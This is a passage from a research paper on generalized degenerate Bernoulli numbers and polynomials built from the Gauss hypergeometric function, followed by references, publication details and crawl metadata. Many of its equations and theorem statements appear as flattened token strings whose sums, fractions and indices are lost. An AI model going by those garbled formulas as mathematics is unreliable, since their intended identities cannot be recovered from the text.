$$\begin{aligned} \frac{t}{e_{\lambda }(t)-1} &= \frac{1}{e_{\lambda }(t)-1}\sum_{n=1}^{ \infty } \lambda ^{n-1}(1)_{n,1/\lambda }\frac{1}{n!} \bigl(e_{\lambda }(t)-1 \bigr)^{n} \\ &= \sum_{k=0}^{\infty }\frac{\lambda ^{k}(1)_{k+1,1/\lambda }}{k+1} \cdot \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k} \\ &= \sum_{k=0}^{\infty }\frac{\lambda ^{k}(1)_{k+1,1/\lambda }}{k+1} \sum _{n=k}^{\infty }S_{2,\lambda }(n,k) \frac{t^{n}}{n!} \\ &= \sum_{n=0}^{\infty } \Biggl(\sum _{k=0}^{n} \frac{\lambda ^{k}(1)_{k+1,1/\lambda }}{k+1}S_{2,\lambda }(n,k) \Biggr) \frac{t^{n}}{n!}. \end{aligned}$$
(16)
Therefore, by (15) and (16), we obtain the following theorem.
Theorem 1
For \(n\ge 0\), we have
$$\beta _{n,\lambda }=\sum_{k=0}^{n} \frac{\lambda ^{k}(1)_{k+1,1/\lambda }}{k+1}S_{2,\lambda }(n,k). $$
Replacing t by \(\log _{\lambda }(1+t)\) in (15), we get
$$\begin{aligned} \frac{\log _{\lambda }(1+t)}{e_{\lambda }(\log _{\lambda }(1+t))-1} &= \sum_{k=0}^{\infty }\beta _{k,\lambda }\frac{1}{k!} \bigl(\log _{ \lambda }(1+t) \bigr)^{k} \\ &= \sum_{k=0}^{\infty }\beta _{k,\lambda }\sum _{n=k}^{\infty }S_{1, \lambda }(n,k) \frac{t^{n}}{n!} \\ &= \sum_{n=0}^{\infty } \Biggl(\sum _{k=0}^{n}S_{1,\lambda }(n,k)\beta _{k, \lambda } \Biggr)\frac{t^{n}}{n!}. \end{aligned}$$
(17)
On the other hand, by (2), we get
$$\begin{aligned} \frac{\log _{\lambda }(1+t)}{e_{\lambda }(\log _{\lambda }(1+t))-1} &= \frac{1}{t}\log _{\lambda }(1+t) = \frac{1}{t}\sum_{n=1}^{\infty } \lambda ^{n-1}(1)_{n,1/\lambda }\frac{t^{n}}{n!} \\ &= \sum_{n=0}^{\infty }\frac{\lambda ^{n}(1)_{n+1,1/\lambda }}{n+1} \frac{t^{n}}{n!}. \end{aligned}$$
(18)
Therefore, by (17) and (18), we obtain the following theorem.
Theorem 2
For \(n\ge 0\), we have
$$\sum_{k=0}^{n}S_{1,\lambda }(n,k)\beta _{k,\lambda }=\frac{1}{n+1} \lambda ^{n}(1)_{n+1,1/\lambda }. $$
From (15) and (16), we note that
n = 0 β n , λ t n n ! = 1 e λ ( t ) 1 n = 1 λ n 1 ( 1 ) n , 1 / λ 1 n ! ( e λ ( t ) 1 ) n = n = 0 ( 1 ) n ( 1 ) n + 1 , 1 / λ λ n n ! ( n + 1 ) ! ( 1 e λ ( t ) ) n n ! = n = 0 1 λ n 1 n 2 n ( 1 e λ ( t ) ) n n ! = 2 F 1 ( 1 λ , 1 2 | 1 e λ ( t ) ) .
(19)
In view of (19), we may consider the generalized degenerate Bernoulli numbers given in terms of Gauss hypergeometric function by
F 1 2 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) = n = 0 β n , λ ( p ) t n n ! ,
(20)
where \(p\in \mathbb{Z}\) with \(p\ge -1\). When \(p=0\), \(\beta _{n,\lambda }^{(0)}=\beta _{n,\lambda }, (n\ge 0)\).
Let us take \(p=-1\) in (20). Then we have
n = 0 β n , λ ( 1 ) t n n ! = 2 F 1 ( 1 λ , 1 1 | 1 e λ ( t ) ) = n = 0 ( λ 1 ) n n ! ( e λ ( t ) 1 ) n = n = 0 ( λ 1 n ) ( e λ ( t ) 1 ) n = e λ λ 1 ( t ) = n = 0 ( λ 1 ) n , λ t n n ! .
(21)
By comparing the coefficients on both sides of (21), we get
$$ \beta _{n,\lambda }^{(-1)}=(\lambda -1)_{n,\lambda } \quad(n\ge 0). $$
(22)
From (20), we note that
n = 0 β n , λ ( p ) t n n ! = 2 F 1 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) = k = 0 1 λ k 1 k p + 2 k ( 1 e λ ( t ) ) k k ! = ( p + 1 ) ! k = 0 λ k ( 1 ) k + 1 , 1 / λ k ! ( p + k + 1 ) ! 1 k ! ( e λ ( t ) 1 ) k = ( p + 1 ) ! k = 0 λ k ( 1 ) k + 1 , 1 / λ k ! ( p + k + 1 ) ! n = k S 2 , λ ( n , k ) t n n ! = n = 0 ( k = 0 n λ k ( 1 ) k + 1 , 1 / λ ( p + k + 1 p + 1 ) S 2 , λ ( n , k ) ) t n n ! .
(23)
Therefore, by comparing the coefficients on both sides of (23), we obtain the following theorem.
Theorem 3
For \(n\ge 0\) and \(p\ge -1\), we have
β n , λ ( p ) = k = 0 n λ k ( 1 ) k + 1 , 1 / λ ( p + k + 1 p + 1 ) S 2 , λ (n,k).
From (6), we get
$$\begin{aligned} \sum_{n=k}^{\infty }S_{2,\lambda }(n,k) \frac{t^{n}}{n!} &= \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k} = \frac{1}{k!}\sum_{l=0}^{k} \binom{k}{l}(-1)^{k-l}e_{\lambda }^{l}(t) \\ &= \sum_{n=0}^{\infty } \Biggl(\frac{1}{k!} \sum_{l=0}^{k}\binom{k}{l}(-1)^{k-l}(l)_{n, \lambda } \Biggr)\frac{t^{n}}{n!}. \end{aligned}$$
(24)
By (24), we get
$$ \sum_{l=0}^{k}\binom{k}{l}(-1)^{k-l}(l)_{n,\lambda }= \textstyle\begin{cases} k!S_{2,\lambda }(n,k) & \text{if $n\ge k$}, \\ 0 & \text{otherwise.} \end{cases} $$
(25)
Let be a difference operator with \(\triangle f(x)=f(x+1)-f(x)\). Then we have
$$\triangle ^{n}f(x)=\sum_{k=0}^{n} \binom{n}{k}(-1)^{n-k}f(x+k). $$
From (25), we have
$$ k!S_{2,\lambda }(n,k)=\triangle ^{k}(0)_{n,\lambda } \quad(n,k\ge 0, n \ge k). $$
(26)
In the light of (11), we may consider the degenerate type Eulerian numbers given by
( 1 ) n m n m λ = k = 0 n m λ k ( 1 ) k + 1 , 1 / λ ( n k m ) k ( 0 ) n , λ k ! .
(27)
By (26) and (27), we get
( 1 ) n m n m λ = k = 0 n m λ k ( 1 ) k + 1 , 1 / λ ( n k m ) S 2 , λ (n,k).
(28)
We observe that
k = 0 n λ k ( 1 ) k + 1 , 1 / λ S 2 , λ ( n , k ) ( t + 1 ) n k = k = 0 n λ k ( 1 ) k + 1 , 1 / λ S 2 , λ ( n , k ) m = 0 n k ( n k m ) t m = m = 0 n ( k = 0 n m λ k ( 1 ) k + 1 , 1 / λ S 2 , λ ( n , k ) ( n k m ) ) t m = m = 0 n ( 1 ) n m n m λ t m .
(29)
From (29) and Theorem 3, we note that
β n , λ ( p ) = k = 0 n λ k ( 1 ) k + 1 , 1 / λ ( p + k + 1 k ) 1 S 2 , λ ( n , k ) = ( p + 1 ) k = 0 n λ k ( 1 ) k + 1 , 1 / λ S 2 , λ ( n , k ) 0 1 t p ( 1 t ) k d t = ( p + 1 ) 0 1 k = 0 n λ k ( 1 t ) n t p ( 1 ) k + 1 , 1 / λ S 2 , λ ( n , k ) ( 1 + t 1 t ) n k d t = ( p + 1 ) 0 1 ( 1 t ) n t p k = 0 n n k λ ( 1 ) n k ( t 1 t ) k d t = ( p + 1 ) k = 0 n n k λ ( 1 ) n k 0 1 ( 1 t ) n k t p + k d t = ( p + 1 ) k = 0 n n k λ ( 1 ) n k ( n k ) ! ( p + k ) ! ( p + n + 1 ) ! = p + 1 n + p + 1 k = 0 n n k λ ( 1 ) n k ( p + n p + k ) 1 .
(30)
Therefore, by (30), we obtain the following theorem.
Theorem 4
For \(n,p\ge 0\), we have
β n , λ ( p ) = p + 1 n + p + 1 k = 0 n n k λ ( 1 ) n k ( p + n p + k ) 1 .
Let r be a positive integer. The unsigned r-Stirling number of the first kind \({n \brack k}_{r}\) is the number of permutations of the set \([n]=\{1,2,3,\dots,n\}\) with exactly k disjoint cycles in such a way that the numbers \(1,2,3,\dots,r\) are in distinct cycles, while the r-Stirling number of the second kind \({n \brace k}_{r}\) counts the number of partitions of the set \([n]\) into k non-empty disjoint subsets in such a way that the numbers \(1,2,3,\dots,r\) are in distinct subsets. In [13], Kim et al. introduced the unsigned degenerate r-Stirling numbers of the first kind \({n \brack k}_{r,\lambda }\) as a degenerate version of \({n \brack k}_{r}\) and the degenerate r-Stirling number of the second kind \({n \brace k}_{r,\lambda }\) as a degenerate version of \({n \brace k}_{r}\). It is well known that the degenerate r-Stirling numbers of the second kind are given by
$$ (x+r)_{n,\lambda }=\sum_{k=0}^{n}{n+r \brace k+r}_{r,\lambda }(x)_{k}\quad (n \ge 1). $$
(31)
From (31), we note that
$$ \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k}e_{\lambda }^{r}(t)= \sum_{n=k}^{ \infty }{n+r \brace k+r}_{r,\lambda }\frac{t^{n}}{n!}\quad (k\ge 0, r \ge 1). $$
(32)
By the Euler transformation formula in (8) and (32), we get
n = 0 β n , λ ( p ) t n n ! = F 1 2 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) = e λ p + λ ( t ) k = 0 p + 1 + λ k p + 1 k p + 2 k ( 1 e λ ( t ) ) k k ! = p + 1 1 p + 1 , 1 / λ k = 0 λ k 1 p + k + 1 , 1 / λ p + k + 1 ( 1 ) k k ! ( e λ ( t ) 1 ) k e λ p + λ ( t ) = p + 1 1 p + 1 , 1 / λ k = 0 λ k 1 p + k + 1 , 1 / λ p + k + 1 ( 1 ) k m = k { m + p k + p } p , λ t m m ! ( 1 + λ t ) = m = 0 p + 1 1 p + 1 , 1 / λ k = 0 m λ k 1 p + k + 1 , 1 / λ p + k + 1 ( 1 ) k { m + p k + p } p , λ t m m ! ( 1 + λ t ) = n = 0 { p + 1 1 p + 1 , 1 / λ k = 0 n λ k 1 p + k + 1 , 1 / λ p + k + 1 ( 1 ) k { n + p k + p } p , λ } t n n ! + n = 1 { n ( p + 1 ) 1 p + 1 , 1 / λ k = 0 n 1 λ k + 1 1 p + k + 1 , 1 / λ p + k + 1 ( 1 ) k { n + p 1 k + p } p , λ } t n n ! ,
(33)
where \(\langle x\rangle _{0,\lambda }=1, \langle x\rangle _{n,\lambda }=x(x+ \lambda )\cdots (x+(n-1)\lambda ) (n\ge 1)\). Therefore, we obtain the following theorem.
Theorem 5
For \(n\ge 1\) and \(p\ge 0\), we have
$$\begin{aligned} \beta _{n,\lambda }^{(p)}={}&\frac{p+1}{\langle 1\rangle _{p+1,1/\lambda }} \sum _{k=0}^{n} \frac{\lambda ^{k}\langle 1\rangle _{p+k+1,1/\lambda }}{p+k+1}(-1)^{k}{n+p \brace k+p}_{p,\lambda } \\ &{} +n\lambda \frac{(p+1)}{\langle 1\rangle _{p+1,1/\lambda }} \sum_{k=0}^{n-1} \frac{\lambda ^{k}\langle 1\rangle _{p+k+1,1/\lambda }}{p+k+1}(-1)^{k}{n+p-1 \brace k+p}_{p,\lambda }. \end{aligned}$$
Note that
$$\lim_{\lambda \rightarrow 0}\beta _{n,\lambda }^{(p)}= \frac{p+1}{p!} \sum_{k=0}^{n}(-1)^{k} \frac{(p+k)!}{p+k+1}{n+p \brace k+p}_{p, \lambda }. $$
From Theorem 3, we have
n = 0 β n , λ ( p ) t n n ! = n = 0 ( k = 0 n λ k ( 1 ) k + 1 , 1 / λ ( p + k + 1 p + 1 ) S 2 , λ ( n , k ) ) t n n ! = k = 0 λ k ( 1 ) k + 1 , 1 / λ ( p + k + 1 p + 1 ) 1 k ! ( e λ ( t ) 1 ) k = ( p + 1 ) k = 0 p ! k ! ( k + p + 1 ) ! λ k ( 1 ) k + 1 , 1 / λ 1 k ! ( e λ ( t ) 1 ) k = ( p + 1 ) k = 0 ( 1 ) k λ k ( 1 ) k + 1 , 1 / λ k ! ( 1 e λ ( t ) ) k 0 1 ( 1 x ) p x k d x = ( p + 1 ) k = 0 ( 1 ) k ( λ 1 k ) ( 1 e λ ( t ) ) k 0 1 ( 1 x ) p x k d x = ( p + 1 ) 0 1 ( 1 x ) p ( 1 x ( 1 e λ ( t ) ) ) λ 1 d x .
(34)
Therefore, we obtain the following theorem.
Theorem 6
For \(p\ge 0\), we have
$$\sum_{n=0}^{\infty }\beta _{n,\lambda }^{(p)} \frac{t^{n}}{n!}=(p+1) \int _{0}^{1}(1-x)^{p} \bigl(1-x \bigl(1-e_{\lambda }(t)\bigr) \bigr)^{\lambda -1}\,dx. $$
3 Generalized degenerate Bernoulli polynomials
In this section, we consider the generalized degenerate Bernoulli polynomials which are derived from the Gauss hypergeometric function. In the light of (20), we define the generalized degenerate Bernoulli polynomials by
n = 0 β n , λ ( p ) (x) t n n ! = 2 F 1 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) e λ x (t).
(35)
When \(x=0\), \(\beta _{n,\lambda }^{(p)}(0)=\beta _{n,\lambda }^{(p)}\) \((n\ge 0)\). Thus, by (35), we get
n = 0 β n , λ ( p ) ( x ) t n n ! = 2 F 1 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) e λ x ( t ) = l = 0 β l , λ ( p ) t l l ! m = 0 ( x ) m , λ t m m ! = n = 0 ( l = 0 n ( n l ) β l , λ ( p ) ( x ) n l , λ ) t n n ! .
(36)
Therefore, by comparing the coefficients on both sides of (36), we obtain the following theorem.
Theorem 7
For \(n\ge 0\), we have
$$\beta _{n,\lambda }^{(p)}(x)=\sum_{l=0}^{n} \binom{n}{l}\beta _{l, \lambda }^{(p)}(x)_{n-l,\lambda }. $$
From (35), we note that
n = 1 d d x β n , λ ( p ) ( x ) t n n ! = 2 F 1 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) d d x e λ x ( t ) = 1 λ log ( 1 + λ t ) 2 F 1 ( 1 λ , 1 p + 2 | 1 e λ ( t ) ) e λ x ( t ) = 1 λ l = 1 ( 1 ) l 1 λ l l t l m = 0 β m , λ ( p ) ( x ) t m m ! = n = 1 ( l = 1 n ( λ ) l 1 l n ! β n l , λ ( p ) ( x ) ( n l ) ! ) t n n ! .
Thus, we have
$$\frac{d}{dx}\beta _{n,\lambda }^{(p)}(x)= \sum _{l=1}^{n}(-\lambda )^{l-1}(l-1)! \binom{n}{l}\beta _{n-l,\lambda }^{(p)}(x). $$
Proposition 8
For \(n\ge 1\), we have
$$\frac{d}{dx}\beta _{n,\lambda }^{(p)}(x)= \sum _{l=1}^{n}(-\lambda )^{l-1}(l-1)! \binom{n}{l}\beta _{n-l,\lambda }^{(p)}(x). $$
By (13), we easily get
$$\begin{aligned} \sum_{n=k}^{\infty }S_{2,\lambda }(n,k|x) \frac{t^{n}}{n!} &= \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k}e_{\lambda }^{x}(t) \\ &= \frac{1}{k!}\sum_{l=0}^{k} \binom{k}{l}(-1)^{k-l}e_{\lambda }^{l+x}(t) \\ &= \sum_{n=0}^{\infty } \Biggl(\frac{1}{k!} \sum_{l=0}^{k}(-1)^{k-l}(l+x)_{n, \lambda } \Biggr)\frac{t^{n}}{n!}. \end{aligned}$$
Thus we have
$$ \frac{1}{k!}\sum_{l=0}^{k} \binom{k}{l}(-1)^{k-l}(l+x)_{n,\lambda }= \textstyle\begin{cases} S_{2,\lambda }(n,k|x), & \text{if $n\ge k$,} \\ 0, & \text{otherwise.} \end{cases} $$
(37)
From (37), we note that
$$S_{2,\lambda }(n,k|x)=\frac{1}{k!}\triangle ^{k}(x)_{n,\lambda }\quad (n \ge k). $$
Lemma 9
For \(n,k\ge 0\) with \(n\ge k\), we have
$$S_{2,\lambda }(n,k|x)=\frac{1}{k!}\triangle ^{k}(x)_{n,\lambda }\quad (n \ge k). $$
Now, we observe that
n = 0 β n , λ ( p ) ( x ) t n n ! = k = 0 ( p + 1 ) ! k ! ( p + k + 1 ) ! λ k ( 1 ) k + 1 , 1 / λ 1 k ! ( e λ ( t ) 1 ) k e λ x ( t ) = k = 0 ( 1 ) k + 1 , 1 / λ λ k ( p + k + 1 p + 1 ) n = k S 2 , λ ( n , k | x ) t n n ! = n = 0 ( k = 0 n ( 1 ) k + 1 , 1 / λ λ k ( p + k + 1 p + 1 ) S 2 , λ ( n , k | x ) ) t n n ! .
(38)
Therefore, by (38), we obtain the following theorem.
Theorem 10
For \(n\ge 0\), we have
β n , λ ( p ) (x)= k = 0 n ( 1 ) k + 1 , 1 / λ λ k ( p + k + 1 p + 1 ) S 2 , λ (n,k|x).
Remark 11
Let p be a nonnegative integer. Then, by Theorem 7 and (35), we easily get
$$\begin{aligned} & \beta _{n,\lambda }^{(p)}(x+y)=\sum_{k=0}^{n} \binom{n}{k}\beta _{k, \lambda }^{(p)}(x) (y)_{n-k,\lambda } \quad(n \ge 0), \\ & \beta _{n,\lambda }^{(p)}(x+1)-\beta _{n,\lambda }^{(p)}(x) = \sum_{k=0}^{n-1}\binom{n}{k}\beta _{k,\lambda }^{(p)}(x) (1)_{n-k, \lambda } \quad(n \ge 1), \\ & \beta _{n,\lambda }^{(p)}(mx) = \sum_{k=0}^{n} \binom{n}{k}\beta _{k, \lambda }^{(p)}(x) (m-1)^{n-k}(x)_{n-k,\lambda /m-1}\quad (n \ge 0, m \ge 2). \end{aligned}$$
4 Conclusion
This work was motivated by Rahmani’s paper [14] in which a new family of p-Bernoulli numbers and polynomials was constructed by means of the Gauss hypergeometric function. This family of numbers and polynomials generalizes the classical Bernoulli numbers and polynomials, in the sense that they reduce to the classical Bernoulli numbers and polynomials for \(p=0\). In the light of the regained recent interests in them, we were interested in finding a degenerate version of those numbers and polynomials. Indeed, the generalized degenerate Bernoulli numbers and polynomials, which reduce to the Carlitz degenerate Bernoulli numbers and polynomials for \(p=0\), were constucted in terms of the Gauss hypergeometric function. Moreover, the degenerate type Eulerian numbers were introduced as a degenerate version of Eulerian numbers.
In this paper, we expressed the generalized degenerate Bernoulli numbers in terms of the degenerate Stirling numbers of the second kind, of the degenerate type Eulerian numbers, of the degenerate p-Stirling numbers of the second kind and of an integral on the unit interval. In addition, we represented the generalized degenerate Bernoulli polynomials in terms of the degenerate Stirling polynomials of the second kind.
It is one of our future projects to continue pursuing this line of research. Namely, by studying degenerate versions of some special polynomials and numbers, we want to find their applications in mathematics, science and engineering.
Availability of data and materials
Not applicable.
References
1. Andrews, G.E., Askey, R., Roy, R.: Special Functions. Cambridge University Press, Cambridge (1999)
Book Google Scholar
2. Bailey, W.N.: Generalized Hypergeometric Series. Cambridge Tracts in Mathematics and Mathematical Physics, vol. 32. Stechert-Hafner, New York (1964)
Google Scholar
3. Carlitz, L.: Degenerate Stirling, Bernoulli and Eulerian numbers. Util. Math. 15, 51–88 (1979)
MathSciNet MATH Google Scholar
4. Comtet, L.: Advanced Combinatorics. Reidel, Dordrecht (1974)
Book Google Scholar
5. Graham, R.L., Knuth, D.E., Patashnik, O.: Concrete Mathematics: A Foundation for Computer Science, 2nd edn. Addison-Wesley, Reading (1994)
MATH Google Scholar
6. Jang, L.-C., Kim, D.S., Kim, T., Lee, H.: Some identities involving derangement polynomials and numbers and moments of gamma random variables. J. Funct. Spaces 2020, Article ID 6624006 (2020)
MathSciNet MATH Google Scholar
7. Kim, D.S., Kim, T.: A note on a new type of degenerate Bernoulli numbers. Russ. J. Math. Phys. 27(2), 227–235 (2020)
Article MathSciNet Google Scholar
8. Kim, T.: A note on degenerate Stirling polynomials of the second kind. Proc. Jangjeon Math. Soc. 20(3), 319–331 (2017)
MathSciNet MATH Google Scholar
9. Kim, T., Kim, D.S.: Note on the degenerate gamma function. Russ. J. Math. Phys. 27(3), 352–358 (2020)
Article MathSciNet Google Scholar
10. Kim, T., Kim, D.S., Kim, H.Y., Kwon, J.: Degenerate Stirling polynomials of the second kind and some applications. Symmetry 11(8), 1046 (2019)
Article Google Scholar
11. Kim, T., Kim, D.S., Kim, H.Y., Kwon, J.: Erratum Kim, T. et al. Degenerate Stirling polynomials of the second kind and some applications. Symmetry 11(8), 1046 (2019). Symmetry 11(12), 1530 (2019)
Article Google Scholar
12. Kim, T., Kim, D.S., Lee, H., Kwon, J.: Degenerate binomial coefficients and degenerate hypergeometric functions. Adv. Differ. Equ. 2020, Article ID 115 (2020)
Article MathSciNet Google Scholar
13. Kim, T., Kim, D.S., Lee, H., Park, J.-W.: A note on degenerate r-Stirling numbers. J. Inequal. Appl. 2020, Article ID 225 (2020)
Article MathSciNet Google Scholar
14. Rahmani, M.: On p-Bernoulli numbers and polynomials. J. Number Theory 157, 350–366 (2015)
Article MathSciNet Google Scholar
Download references
Acknowledgements
The authors would like to thank the reviewers for their valuable comments and suggestions and Jangjeon Institute for Mathematical Science for the support of this research.
Funding
The first author has been conducted by the Research Grant of Kwangwoon University in 2021.
Author information
Authors and Affiliations
Authors
Contributions
TK and DSK conceived of the framework and structured the whole paper; DSK and TK wrote the paper; HL typed; LCJ, and HYK checked the results of the paper; DSK and TK completed the revision of the paper. All authors have read and approved the final version of the manuscript.
Corresponding author
Correspondence to Lee-Chae Jang.
Ethics declarations
Competing interests
The authors declare that they have no competing interests.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/.
Reprints and Permissions
About this article
Check for updates. Verify currency and authenticity via CrossMark
Cite this article
Kim, T., Kim, D.S., Jang, LC. et al. Generalized degenerate Bernoulli numbers and polynomials arising from Gauss hypergeometric function. Adv Differ Equ 2021, 175 (2021). https://doi.org/10.1186/s13662-021-03337-5
Download citation
• Received:
• Accepted:
• Published:
• DOI: https://doi.org/10.1186/s13662-021-03337-5
MSC
• 11B68
• 11B73
• 11B83
• 33C05
Keywords
• Generalized degenerate Bernoulli numbers
• Generalized degenerate Bernoulli polynomials
• Degenerate type Eulerian numbers
|
{
"url": "https://advancesincontinuousanddiscretemodels.springeropen.com/articles/10.1186/s13662-021-03337-5",
"source_domain": "advancesincontinuousanddiscretemodels.springeropen.com",
"snapshot_id": "CC-MAIN-2023-23",
"warc_metadata": {
"Content-Length": "492902",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:7GCE3RDSKYHSPRJYGCWU74VKZFHTUFUY",
"WARC-Concurrent-To": "<urn:uuid:2d66e262-a6c8-41d4-8c86-ba8b10c086ef>",
"WARC-Date": "2023-06-04T14:47:46Z",
"WARC-IP-Address": "146.75.36.95",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:WW7RBZQIQWXPEBZBFCBAE6C4CDGWCT3J",
"WARC-Record-ID": "<urn:uuid:14f2b8ff-3721-4b24-b0d0-87b261b2ca94>",
"WARC-Target-URI": "https://advancesincontinuousanddiscretemodels.springeropen.com/articles/10.1186/s13662-021-03337-5",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e0ee92fe-d6f8-4153-b10f-046fb7d56d66>"
},
"warc_info": "isPartOf: CC-MAIN-2023-23\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May/June 2023\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-63\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
21,
22,
53,
54,
154,
155,
164,
165,
1068,
1069,
1084,
1085,
2413,
2414,
3732,
3733,
3821,
3822,
3966,
3970,
3971,
4142,
4143,
4330,
4331,
4453,
4457,
4458,
4531,
4532,
4612,
4616,
4617,
4686,
4687,
4786,
4787,
4885,
4889,
4890,
4921,
4922,
5040,
5044,
5045,
5049,
5050,
5196,
5200,
5201,
5269,
5270,
5338,
5342,
5343,
5432,
5433,
5478,
5479,
5557,
5561,
5562,
5727,
5728,
5790,
5794,
5795,
5799,
5800,
5829,
5834,
5835,
5861,
5862,
5922,
5927,
5928,
5932,
5933,
5977,
5982,
5983,
6064,
6065,
6231,
6236,
6237,
6259,
6260,
6494,
6499,
6500,
6646,
6647,
6712,
6713,
6850,
6855,
6856,
6975,
6976,
7019,
7020,
7043,
7044,
7632,
7637,
7638,
7700,
7701,
7711,
7712,
7736,
7737,
7842,
7843,
7900,
7901,
8316,
8321,
8322,
8356,
8357,
8667,
8672,
8673,
8735,
8736,
8746,
8747,
8771,
8772,
8878,
8879,
8912,
8913,
9163,
9168,
9169,
9298,
9299,
9369,
9374,
9375,
9494,
9495,
9538,
9539,
9727,
9732,
9733,
9793,
9794,
9868,
9873,
9874,
9898,
9899,
10291,
10296,
10297,
10394,
10395,
10405,
10406,
10446,
10447,
10530,
10531,
10548,
10549,
10888,
10893,
10894,
10910,
10911,
11076,
11081,
11082,
11161,
11162,
11231,
11232,
11251,
11252,
11337,
11342,
11343,
11427,
11428,
11510,
11515,
11516,
11541,
11542,
11619,
11624,
11625,
11641,
11642,
11894,
11899,
11900,
11938,
11939,
12479,
12484,
12485,
12538,
12539,
12549,
12550,
12576,
12577,
12653,
12654,
13544,
13545,
13637,
13642,
13643,
13667,
13668,
13833,
13838,
13839,
13899,
13900,
14638,
14643,
14644,
14812,
14813,
14823,
14824,
14863,
14864,
15276,
15277,
15287,
15288,
15438,
15439,
15463,
15464,
15978,
15983,
15984,
16028,
16029,
16039,
16040,
16064,
16065,
16227,
16228,
16275,
16276,
16496,
16497,
16580,
16585,
16586,
16695,
16696,
16904,
16909,
16910,
17007,
17008,
17018,
17019,
17043,
17044,
17151,
17152,
17176,
17177,
17491,
17492,
17506,
17507,
17637,
17638,
17652,
17653,
17677,
17678,
17808,
17809,
17832,
17833,
18189,
18190,
18203,
18204,
18386,
18391,
18392,
18416,
18417,
18503,
18504,
18512,
18513,
18555,
18556,
18642,
18643,
18664,
18665,
18983,
18988,
18989,
19042,
19043,
19054,
19055,
19079,
19080,
19168,
19169,
19179,
19180,
19255,
19256,
19728,
19729,
19742,
19743,
20576,
20577,
20997,
20998,
21232,
21233,
21268,
21269,
21285,
21286,
21297,
21298,
21402,
21403,
21429,
21430,
21584,
21585,
21605,
21606,
21706,
21707,
21745,
21746,
21812,
21813,
21839,
21840,
21984,
21985,
22011,
22012,
22209,
22210,
22248,
22249,
22371,
22372,
22413,
22414,
22538,
22539,
22577,
22578,
22685,
22686,
22727,
22728,
22877,
22878,
22907,
22908,
23110,
23111,
23140,
23141,
23306,
23307,
23348,
23349,
23484,
23485,
23526,
23527,
23623,
23624,
23665,
23666,
23686,
23687,
23704,
23705,
23877,
23878,
23886,
23887,
23978,
23979,
23998,
23999,
24024,
24025,
24033,
24034,
24048,
24049,
24324,
24325,
24346,
24347,
24380,
24381,
24401,
24402,
24422,
24423,
24482,
24483,
24506,
24507,
25358,
25359,
25384,
25385,
25404,
25405,
25471,
25472,
25490,
25491,
25705,
25706,
25724,
25725,
25739,
25740,
25754,
25755,
25770,
25771,
25823,
25824,
25828,
25829,
25839,
25849,
25859,
25869,
25870,
25879,
25880,
25925,
25974
],
"line_end_idx": [
21,
22,
53,
54,
154,
155,
164,
165,
1068,
1069,
1084,
1085,
2413,
2414,
3732,
3733,
3821,
3822,
3966,
3970,
3971,
4142,
4143,
4330,
4331,
4453,
4457,
4458,
4531,
4532,
4612,
4616,
4617,
4686,
4687,
4786,
4787,
4885,
4889,
4890,
4921,
4922,
5040,
5044,
5045,
5049,
5050,
5196,
5200,
5201,
5269,
5270,
5338,
5342,
5343,
5432,
5433,
5478,
5479,
5557,
5561,
5562,
5727,
5728,
5790,
5794,
5795,
5799,
5800,
5829,
5834,
5835,
5861,
5862,
5922,
5927,
5928,
5932,
5933,
5977,
5982,
5983,
6064,
6065,
6231,
6236,
6237,
6259,
6260,
6494,
6499,
6500,
6646,
6647,
6712,
6713,
6850,
6855,
6856,
6975,
6976,
7019,
7020,
7043,
7044,
7632,
7637,
7638,
7700,
7701,
7711,
7712,
7736,
7737,
7842,
7843,
7900,
7901,
8316,
8321,
8322,
8356,
8357,
8667,
8672,
8673,
8735,
8736,
8746,
8747,
8771,
8772,
8878,
8879,
8912,
8913,
9163,
9168,
9169,
9298,
9299,
9369,
9374,
9375,
9494,
9495,
9538,
9539,
9727,
9732,
9733,
9793,
9794,
9868,
9873,
9874,
9898,
9899,
10291,
10296,
10297,
10394,
10395,
10405,
10406,
10446,
10447,
10530,
10531,
10548,
10549,
10888,
10893,
10894,
10910,
10911,
11076,
11081,
11082,
11161,
11162,
11231,
11232,
11251,
11252,
11337,
11342,
11343,
11427,
11428,
11510,
11515,
11516,
11541,
11542,
11619,
11624,
11625,
11641,
11642,
11894,
11899,
11900,
11938,
11939,
12479,
12484,
12485,
12538,
12539,
12549,
12550,
12576,
12577,
12653,
12654,
13544,
13545,
13637,
13642,
13643,
13667,
13668,
13833,
13838,
13839,
13899,
13900,
14638,
14643,
14644,
14812,
14813,
14823,
14824,
14863,
14864,
15276,
15277,
15287,
15288,
15438,
15439,
15463,
15464,
15978,
15983,
15984,
16028,
16029,
16039,
16040,
16064,
16065,
16227,
16228,
16275,
16276,
16496,
16497,
16580,
16585,
16586,
16695,
16696,
16904,
16909,
16910,
17007,
17008,
17018,
17019,
17043,
17044,
17151,
17152,
17176,
17177,
17491,
17492,
17506,
